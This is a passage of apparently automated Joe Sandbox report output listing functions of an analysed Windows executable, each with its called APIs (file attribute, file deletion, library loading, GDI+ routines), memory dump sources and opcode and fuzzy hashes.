                  • Instruction ID: bc81cbd45ad5c1580794f1a3d660ca32c6c1c8a3e5a08935e72801f5bbd2af6b
                  • Opcode Fuzzy Hash: 58e7f89d594da40632a5dbac5a82844e6d26cd18450de25811bf6c83ce388060
                  • Instruction Fuzzy Hash: E2E09232E14109BBEF09CAA49C049BB7B9DEB08228720417DEE17D3301FE30DE05A6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A489
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: c3395235846c411a0e82498c7f5fd751f872f9b55eed08e101991ad396fd7a67
                  • Instruction ID: 649ddb9b1277dfd3b2e1bce084f5ccb53bd32cf4693a6cd1614d6b3f62bf7c39
                  • Opcode Fuzzy Hash: c3395235846c411a0e82498c7f5fd751f872f9b55eed08e101991ad396fd7a67
                  • Instruction Fuzzy Hash: C8F0A03124020DBBDF129F60DC05FE93B6CBB043A5F048055FC8886161DBB68AA8BA50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 4c070bceaed230d8151a08a596bf64b4178c4bf7b81405ed6cc889d5cf563695
                  • Instruction ID: d8f0b4c7e10b58d0892f7c8c02b1dda45b9bc041cb7533eeab097830b90cab34
                  • Opcode Fuzzy Hash: 4c070bceaed230d8151a08a596bf64b4178c4bf7b81405ed6cc889d5cf563695
                  • Instruction Fuzzy Hash: 03F0EC7154034C7AEB11EF709C06FA93F5CEB04745F040556BB04530A1DD756A607762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,00F3984C,?,?,00F39688,?,?,?,?,00F61FA1,000000FF), ref: 00F3A13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00F3984C,?,?,00F39688,?,?,?,?,00F61FA1,000000FF), ref: 00F3A16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cbb65a4ea551b9ee87218ce85d93887b3265dfb11004a37cf614af8134fb1104
                  • Instruction ID: baac49517d06ba538627f9140a9f715ffaa1db1ccfe8cca4011bc3f8bed1f2ed
                  • Opcode Fuzzy Hash: cbb65a4ea551b9ee87218ce85d93887b3265dfb11004a37cf614af8134fb1104
                  • Instruction Fuzzy Hash: 36E0923564020C7BEB11AF71DC41FE97B5CBB093A1F484065BD88C3161DB629D98BE90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                  Download Yara Rule
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00F61FA1,000000FF), ref: 00F4A3D1
                  • OleUninitialize.OLE32(?,?,?,?,00F61FA1,000000FF), ref: 00F4A3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: 2e4a481108ca5342f96717cb7be0457a8e4e98a482a911f4bcfdbc19292a9a84
                  • Instruction ID: 29058fb5ee1c659b5136fddab1566479729f9096739fb940e0136f9422b0381c
                  • Opcode Fuzzy Hash: 2e4a481108ca5342f96717cb7be0457a8e4e98a482a911f4bcfdbc19292a9a84
                  • Instruction Fuzzy Hash: D8F06532558658EFC710DF4CDC05B15FBACFB49B20F04436AF41993760CB746811DA91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,00F3A189,?,00F376B2,?,?,?,?), ref: 00F3A1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F3A189,?,00F376B2,?,?,?,?), ref: 00F3A1D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 003fbb64b536b5aab61debf22b3331b582793a40f82faffd3c53e50831153884
                  • Instruction ID: 5967e72d040fa3870b3c93b313fd41bc4f498d7357c0a9369371e0b225f23340
                  • Opcode Fuzzy Hash: 003fbb64b536b5aab61debf22b3331b582793a40f82faffd3c53e50831153884
                  • Instruction Fuzzy Hash: 73E09B3590011C67CB21AB64DC05BE57B5CAB083F1F0041A1FD54D3291D7709D44AEE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 74ec76f88a38d4b17f2333a8e46364bf2841ad4ecdcf5b7fea3b257c038bae99
                  • Instruction ID: dabaa986be2d0c161a5f223b259b4df6d5fe8655397649640fc841b822b9723c
                  • Opcode Fuzzy Hash: 74ec76f88a38d4b17f2333a8e46364bf2841ad4ecdcf5b7fea3b257c038bae99
                  • Instruction Fuzzy Hash: 8CE0127690511C7ADB219BA49C05FE67B6CFF09392F0400A5BA48D3105DAB49A449BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                  Download Yara Rule
                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F49B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F49B37
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: a9eb53053ae36885c9b2f905221192bda7309f94326b83a5de1290e2f9538b47
                  • Instruction ID: e2e6c1cb8732f0d92305364bfcafd885e5a3c1ad544d4542de3739f742aad317
                  • Opcode Fuzzy Hash: a9eb53053ae36885c9b2f905221192bda7309f94326b83a5de1290e2f9538b47
                  • Instruction Fuzzy Hash: 90E0ED71905218EBCB20DF98D90179ABBE8EB05321F10809FEC9593201D6B56F14AB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F5329A: try_get_function.LIBVCRUNTIME ref: 00F532AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F52185
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: 20659d96cadbb1496808481e9a3e2eb6d50cb0ee9b856c0c4a47e4daa82eba3c
                  • Instruction ID: 3059747ecd95aee3c4c4b2094c16dbb1e0195e926be0f47c0ba0f0c15b91f517
                  • Opcode Fuzzy Hash: 20659d96cadbb1496808481e9a3e2eb6d50cb0ee9b856c0c4a47e4daa82eba3c
                  • Instruction Fuzzy Hash: ACD0A727504F06242CC426B42C4219B33445B53BB33E10745EF20C54D2EE16804C7012
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DloadLock.DELAYIMP ref: 00F4DC73
                  • DloadProtectSection.DELAYIMP ref: 00F4DC8F
                    • Part of subcall function 00F4DE67: DloadObtainSection.DELAYIMP ref: 00F4DE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: aa663311c414bcc3122774a0d34a347c08a622629c6ad924f453f6db217bc97e
                  • Instruction ID: 670103819fc0fddbeeddc503773d6fde347e4704e1b6749f97f469fcc45519ea
                  • Opcode Fuzzy Hash: aa663311c414bcc3122774a0d34a347c08a622629c6ad924f453f6db217bc97e
                  • Instruction Fuzzy Hash: 82D012709002055ED613EB149D8A71C3A74B70475CFA40643FA06E71A0DFF84C80F606
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F312E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: 58d4bfb3aad99ab2fbfc204ca57b59617198c0baf5027332ede596fde55cab4d
                  • Instruction ID: ec3b3eb17beba38a814c10568b2fbbd7b7ddd6540a8e6ed011f20eeb53783f06
                  • Opcode Fuzzy Hash: 58d4bfb3aad99ab2fbfc204ca57b59617198c0baf5027332ede596fde55cab4d
                  • Instruction Fuzzy Hash: 01C01232858208BECB410BB0DC09D2FBBA8BBA4212F05C90AB2A5C0060C238C0A0EB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F319A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 5aedaf9638b3308ce84781b7f2e0f201d9c399be5220c27aed7f307ba7527719
                  • Instruction ID: c2e075d76a97ea340130458442cc6ddaee9f9ce82f644b568e00095933e82de1
                  • Opcode Fuzzy Hash: 5aedaf9638b3308ce84781b7f2e0f201d9c399be5220c27aed7f307ba7527719
                  • Instruction Fuzzy Hash: 0CC19F30E042589FEF15DF68C894BA97BA5BF0A330F0840B9DC45DB386CB759944EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F33B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a13d088fed9bf014c8f7984b6708839340af63a540b5a0b9951ec80e2fbb9523
                  • Instruction ID: d52f90d63369d0e73b19ebfdcb25e2d63716807f89311bac08b5e3ebf22b5c66
                  • Opcode Fuzzy Hash: a13d088fed9bf014c8f7984b6708839340af63a540b5a0b9951ec80e2fbb9523
                  • Instruction Fuzzy Hash: 48710471504F48AEDB21DF30CC41AEBB7E8AF14321F44496EE5AB87242DB356A48EF11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F38384
                    • Part of subcall function 00F31380: __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F31380: new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F319A6: __EH_prolog.LIBCMT ref: 00F319AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 90cd33fea07da460a790a319d5feb73419299f3f9d8173e2f0da13cdf5bff576
                  • Instruction ID: 124ab8c5bcf13f12956c7bc00a4307674f1fb1eed174d0ae30bf4e3d62f3b850
                  • Opcode Fuzzy Hash: 90cd33fea07da460a790a319d5feb73419299f3f9d8173e2f0da13cdf5bff576
                  • Instruction Fuzzy Hash: 89419171C407549ADF20EB60CC55BEA77A8AF50360F0440EAF58AA3493DF7D5AC9EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F31E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31E05
                    • Part of subcall function 00F33B3D: __EH_prolog.LIBCMT ref: 00F33B42
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 2ce05786291ca3f85716fe9d5133a0fb5573cd41c450d195d61a497c05f98a66
                  • Instruction ID: d794947bb0086778bfc758fadbaacf8dbd0f780dab097175bff6dbbb6a35d111
                  • Opcode Fuzzy Hash: 2ce05786291ca3f85716fe9d5133a0fb5573cd41c450d195d61a497c05f98a66
                  • Instruction Fuzzy Hash: F82148329041089FCB11EF98DD519EEFBF6BF58310F1001ADE845A7251CB366E54EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4A7C8
                    • Part of subcall function 00F31380: __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F31380: new.LIBCMT ref: 00F313FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a5c1357aa131d71fc5f74de6a70c5450dd2d505a013210e2783ad8421735f8ee
                  • Instruction ID: bef9d7fd326b59b80ba0c03a2838cfc495b0c273619cf2df41d600ca0ad9b342
                  • Opcode Fuzzy Hash: a5c1357aa131d71fc5f74de6a70c5450dd2d505a013210e2783ad8421735f8ee
                  • Instruction Fuzzy Hash: B8213D75C042499ACF15DF94CD525EEBBB4FF19310F1004AEE809A7252DB396E06EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F392E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a2b9cb5be93685cbcf9bc48181df14bfe5e833960fae42ea55e1b55f807c449d
                  • Instruction ID: 41a0ba9da631216152ba32dab708e215c8182d7666610d6ecb702e49c71a2894
                  • Opcode Fuzzy Hash: a2b9cb5be93685cbcf9bc48181df14bfe5e833960fae42ea55e1b55f807c449d
                  • Instruction Fuzzy Hash: 9E117CB3E045289BCB22AAA8CC919DEB73ABF48770F044115F804B7251CBB98D10A7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
